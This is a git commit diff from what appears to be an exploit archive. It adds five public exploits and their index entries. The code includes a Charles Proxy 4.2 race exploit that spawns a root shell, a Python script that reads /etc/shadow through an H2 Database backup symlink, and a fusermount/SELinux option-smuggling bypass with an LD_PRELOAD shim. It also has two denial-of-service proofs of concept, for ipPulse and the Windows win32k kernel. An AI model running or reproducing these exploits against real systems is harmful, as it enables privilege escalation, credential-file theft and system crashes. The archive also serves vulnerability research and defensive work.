DB: 2018-07-31
5 changes to exploits/shellcodes fusermount - user_allow_other Restriction Bypass and SELinux Label Control ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC) Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC) Charles Proxy 4.2 - Local Privilege Escalation H2 Database 1.4.197 - Information Disclosure
This commit is contained in:
parent
582d8f748e
commit
b02440845e
6 changed files with 357 additions and 0 deletions
100
exploits/linux/dos/45106.c
Normal file
100
exploits/linux/dos/45106.c
Normal file
|
@ -0,0 +1,100 @@
|
|||
/*
|
||||
It is possible to bypass fusermount's restrictions on the use of the
|
||||
"allow_other" mount option as follows if SELinux is active.
|
||||
|
||||
Here's a minimal demo, tested on a Debian system with SELinux enabled in
|
||||
permissive mode:
|
||||
|
||||
===============================================
|
||||
uuser@debian:~$ mount|grep /mount
|
||||
user@debian:~$ grep user_allow_other /etc/fuse.conf
|
||||
#user_allow_other
|
||||
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
|
||||
fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
|
||||
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
|
||||
sending file descriptor: Bad file descriptor
|
||||
user@debian:~$ mount|grep /mount
|
||||
/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
|
||||
===============================================
|
||||
|
||||
Here's a demo that actually mounts a real FUSE filesystem with allow_other,
|
||||
again on a Debian system configured to use SELinux:
|
||||
===============================================
|
||||
user@debian:~$ cat fuse-shim.c
|
||||
*/
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <dlfcn.h>
|
||||
#include <stdlib.h>
|
||||
int execv(const char *path, char *const argv_[]) {
|
||||
char **argv = (void*)argv_; /* cast away const */
|
||||
for (char **argvp = argv; *argvp != NULL; argvp++) {
|
||||
char *arg = *argvp;
|
||||
for (char *p = arg; *p; p++) {
|
||||
if (*p == '#') *p = '\\';
|
||||
}
|
||||
}
|
||||
int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
|
||||
execv_real(path, argv_);
|
||||
}
|
||||
|
||||
/*
|
||||
user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
|
||||
user@debian:~$ echo hello world > hello.txt
|
||||
user@debian:~$ zip hello.zip hello.txt
|
||||
adding: hello.txt (stored 0%)
|
||||
user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
|
||||
user@debian:~$ mount|grep /mount
|
||||
fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
|
||||
user@debian:~$ sudo bash
|
||||
root@debian:/home/user# ls -laZ mount
|
||||
total 5
|
||||
drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 .
|
||||
drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 ..
|
||||
-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt
|
||||
root@debian:/home/user# cat mount/hello.txt
|
||||
hello world
|
||||
===============================================
|
||||
|
||||
|
||||
I have tested that this also works on Fedora (which, unlike Debian, has SELinux
|
||||
enabled by default.)
|
||||
|
||||
|
||||
Unfortunately, I only noticed that this was possible after I publicly sent some
|
||||
fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
|
||||
when the maintainer asked a question about one of the patches.
|
||||
|
||||
|
||||
Breaking down the attack, the problems are:
|
||||
|
||||
1. fusermount's do_mount() is written as if backslashes escape commas in mount
|
||||
options; however, this is only true for the "fsname" and "subtype"
|
||||
pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
|
||||
filesystem follow those semantics. This means that an attacker can smuggle
|
||||
a forbidden option through fusermount's checks if the previous option ends
|
||||
with a backslash. However, no option accepted by the FUSE filesystem can end
|
||||
with a backslash, so this seemed unexploitable at first.
|
||||
This is fixed by the following commit in my pull request:
|
||||
https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
|
||||
2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
|
||||
the mount options understood by the SELinux and Smack LSMs. LSMs have the
|
||||
opportunity to grab mount options and make them invisible to the actual
|
||||
filesystem through the security_sb_copy_data() security hook.
|
||||
For this attack, I'm using the "context" option.
|
||||
This is fixed by the following commit in my pull request:
|
||||
https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
|
||||
3. The SELinux LSM is slightly lax about parsing the level component of SELinux
|
||||
context strings when the policy uses Multi-Level Security (MLS).
|
||||
When using MLS, the format of a context string is
|
||||
"<user>:<role>:<type>:<level>"; the level component is parsed by
|
||||
mls_context_to_sid(). The level component is supposed to specify a
|
||||
sensitivity range (one or two parts delimited with '-'); each part of the
|
||||
range may be followed by ':' and a category set specification.
|
||||
If the sensitivity range consists of two parts and the second part of the
|
||||
range is followed by a category set, the function incorrectly marks a
|
||||
trailing '-' and any following data until ':' or '\0' as consumed, but does
|
||||
not actually parse this data. This allows an attacker to smuggle a backslash
|
||||
through.
|
||||
*/
|
68
exploits/linux/webapps/45105.py
Executable file
68
exploits/linux/webapps/45105.py
Executable file
|
@ -0,0 +1,68 @@
|
|||
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
|
||||
# Date: 2018-07-16
|
||||
# Exploit Author: owodelta
|
||||
# Vendor Homepage: www.h2database.com
|
||||
# Software Link: http://www.h2database.com/html/download.html
|
||||
# Version: all versions
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2018-14335
|
||||
|
||||
# Description: Insecure handling of permissions in the backup function allows
|
||||
# attackers to read sensitive files (outside of their permissions) via a
|
||||
# symlink to a fake database file.
|
||||
|
||||
# PS, thanks to HTB and our team FallenAngels
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
import os
|
||||
import random
|
||||
|
||||
def cleanup(wdir):
|
||||
cmd = "rm {}symlink.trace.db".format(wdir)
|
||||
os.system(cmd)
|
||||
|
||||
def create_symlink(file, wdir):
|
||||
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
|
||||
os.system(cmd)
|
||||
|
||||
|
||||
def trigger_symlink(host, wdir):
|
||||
outputName = str(random.randint(1000,10000))+".zip"
|
||||
#get cookie
|
||||
url = 'http://{}'.format(host)
|
||||
r = requests.get(url)
|
||||
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
|
||||
url = '{}/{}'.format(url,path)
|
||||
payload = {
|
||||
"tool":"Backup",
|
||||
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
|
||||
#print url
|
||||
requests.post(url,data=payload).text
|
||||
print "File is zipped in: "+wdir+outputName
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser()
|
||||
required = parser.add_argument_group('required arguments')
|
||||
required.add_argument("-H",
|
||||
"--host",
|
||||
metavar='127.0.0.1:8082',
|
||||
help="Target host",
|
||||
required=True)
|
||||
required.add_argument("-D",
|
||||
"--dir",
|
||||
metavar="/tmp/",
|
||||
default="/tmp/",
|
||||
help="Writable directory")
|
||||
required.add_argument("-F",
|
||||
"--file",
|
||||
metavar="/etc/shadow",
|
||||
default="/etc/shadow",
|
||||
help="Desired file to read",)
|
||||
args = parser.parse_args()
|
||||
|
||||
create_symlink(args.file,args.dir)
|
||||
trigger_symlink(args.host,args.dir)
|
||||
cleanup(args.dir)
|
80
exploits/macos/local/45107.txt
Normal file
80
exploits/macos/local/45107.txt
Normal file
|
@ -0,0 +1,80 @@
|
|||
Charles Proxy is a great mac application for debugging web services and
|
||||
inspecting SSL traffic for any application on your machine.
|
||||
|
||||
In order to inspect the SSL traffic it needs to configure the system to use a
|
||||
proxy so that it can capture the packets and use its custom root CA to decode
|
||||
the SSL.
|
||||
|
||||
Setting a system-wide proxy requires root permissions so this is handled by an
|
||||
suid binary located within the Charles application folder:
|
||||
|
||||
/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
|
||||
|
||||
Unfortunately this binary is vulnerable to a race condition which allows a local
|
||||
user to spawn a root shell. It supports a parameter "--self-repair" which it
|
||||
uses to re-set the root+suid permissions on itself, with a graphical dialog
|
||||
shown to the user. However if this is called when the binary is already
|
||||
root+suid then no password dialog is shown.
|
||||
|
||||
It doesn't validate the path to itself and uses a simple API call to get the
|
||||
path to the binary at the time it was invoked. This means that between executing
|
||||
the binary and reaching the code path where root+suid is set there is enough
|
||||
time to replace the path to the binary with an alternate payload which will then
|
||||
receive the suid+root permissions instead of the Charles binary.
|
||||
|
||||
This issue was fixed in Charles 4.2.1 released in November 2017.
|
||||
|
||||
https://m4.rkw.io/charles_4.2.sh.txt
|
||||
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
|
||||
-------------------------------------------------------------------------------
|
||||
#!/bin/bash
|
||||
|
||||
####################################################
|
||||
###### Charles 4.2 local root privesc exploit ######
|
||||
###### by m4rkw - https://m4.rkw.io/blog.html ######
|
||||
####################################################
|
||||
|
||||
cd
|
||||
user="`whoami`"
|
||||
|
||||
cat > charles_exploit.c <<EOF
|
||||
#include <unistd.h>
|
||||
int main()
|
||||
{
|
||||
setuid(0);
|
||||
seteuid(0);
|
||||
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
|
||||
return 0;
|
||||
}
|
||||
EOF
|
||||
|
||||
gcc -o charles_exploit charles_exploit.c
|
||||
if [ $? -ne 0 ] ; then
|
||||
echo "failed to compile the exploit, you need xcode cli tools for this."
|
||||
exit 1
|
||||
fi
|
||||
rm -f charles_exploit.c
|
||||
|
||||
ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
|
||||
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
|
||||
rm -f ./Charles\ Proxy\ Settings
|
||||
mv charles_exploit Charles\ Proxy\ Settings
|
||||
|
||||
i=0
|
||||
|
||||
while :
|
||||
do
|
||||
r=`ls -la Charles\ Proxy\ Settings |grep root`
|
||||
if [ "$r" != "" ] ; then
|
||||
break
|
||||
fi
|
||||
sleep 0.1
|
||||
i=$((i+1))
|
||||
if [ $i -eq 10 ] ; then
|
||||
rm -f Charles\ Proxy\ Settings
|
||||
echo "Not vulnerable"
|
||||
exit 1
|
||||
fi
|
||||
done
|
||||
|
||||
./Charles\ Proxy\ Settings
|
26
exploits/windows/dos/45102.py
Executable file
26
exploits/windows/dos/45102.py
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
|
||||
# Discovery by: Luis Martinez
|
||||
# Discovery Date: 2018-07-27
|
||||
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
|
||||
# Software Link : http://download.netscantools.com/ipls192.zip
|
||||
# Tested Version: 1.92
|
||||
# Vulnerability Type: Denial of Service (DoS) Local
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
# Steps to Produce the Crash:
|
||||
# 1.- Run python code : python ipPulse_1.92.py
|
||||
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
|
||||
# 3.- Open ippulse.exe
|
||||
# 4.- Target Editor
|
||||
# 5.- Paste ClipBoard on "IP Address/HostName"
|
||||
# 6.- Paste ClipBoard on "Comment"
|
||||
# 7.- Add Above Fields to Target List >>
|
||||
# 8.- OK
|
||||
# 9.- Crashed
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
buffer = "\x41" * 3400
|
||||
f = open ("ipPulse_1.92.txt", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
78
exploits/windows/dos/45104.c
Normal file
78
exploits/windows/dos/45104.c
Normal file
|
@ -0,0 +1,78 @@
|
|||
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
|
||||
# Author: vportal
|
||||
# Date: 2018-07-27
|
||||
# Vendor homepage: http://www.microsoft.com
|
||||
# Version: Windows 7 x86
|
||||
# Tested on: Windows 7 x86
|
||||
# CVE: N/A
|
||||
|
||||
# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
|
||||
# call NtUserConsoleControl with the following arguments:
|
||||
|
||||
# NtUserControlConsole(1,0,8).
|
||||
# NtUserControlConsole(4,0,8).
|
||||
# NtUserControlConsole(6,0,12).
|
||||
# NtUserControlConsole(2,0,12).
|
||||
# NtUserControlConsole(3,0,20).
|
||||
# NtUserControlConsole(5,0,8).
|
||||
|
||||
# Different crashes are reproduced for each case. For the second case the crash is showed below:
|
||||
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
|
||||
# en 0x%08lx. La memoria no se pudo %s.
|
||||
# FAULTING_IP:
|
||||
# win32k!xxxSetConsoleCaretInfo+c
|
||||
# 93310641 8b0e mov ecx,dword ptr [esi]
|
||||
|
||||
# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
|
||||
# ErrCode = 00000000
|
||||
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
|
||||
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
|
||||
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
|
||||
# win32k!xxxSetConsoleCaretInfo+0xc:
|
||||
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
|
||||
# Resetting default scope
|
||||
|
||||
# CUSTOMER_CRASH_COUNT: 1
|
||||
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
|
||||
# BUGCHECK_STR: 0x8E
|
||||
# PROCESS_NAME: Win32k-fuzzer_
|
||||
|
||||
# CURRENT_IRQL: 0
|
||||
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641
|
||||
|
||||
# STACK_TEXT:
|
||||
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
|
||||
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
|
||||
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
|
||||
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
|
||||
# WARNING: Frame IP not in any known module. Following frames may be wrong.
|
||||
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
|
||||
|
||||
# PoC code:
|
||||
|
||||
#include <Windows.h>
|
||||
|
||||
extern "C"
|
||||
|
||||
ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
|
||||
{
|
||||
__asm{mov eax, ApiNumber};
|
||||
__asm{lea edx, ApiNumber + 4};
|
||||
__asm{int 0x2e};
|
||||
}
|
||||
|
||||
|
||||
int _tmain(int argc, _TCHAR* argv[])
|
||||
{
|
||||
|
||||
int st = 0;
|
||||
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
|
||||
|
||||
LoadLibrary(L"user32.dll");
|
||||
|
||||
st = (int)SystemCall32(syscall_ID, 4, 0, 8);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
# The vulnerability has only been tested in Windows 7 x86.
|
|
@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
|
|||
44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
|
||||
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
|
||||
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
|
||||
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
|
||||
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
|
||||
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
|
||||
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
|
||||
|
@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port
|
|||
45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
|
||||
45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
|
||||
45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
|
||||
45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows,
|
||||
45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port
|
|||
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
|
||||
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
|
||||
45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
|
||||
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port
|
|||
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
|
||||
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
|
||||
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
|
||||
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue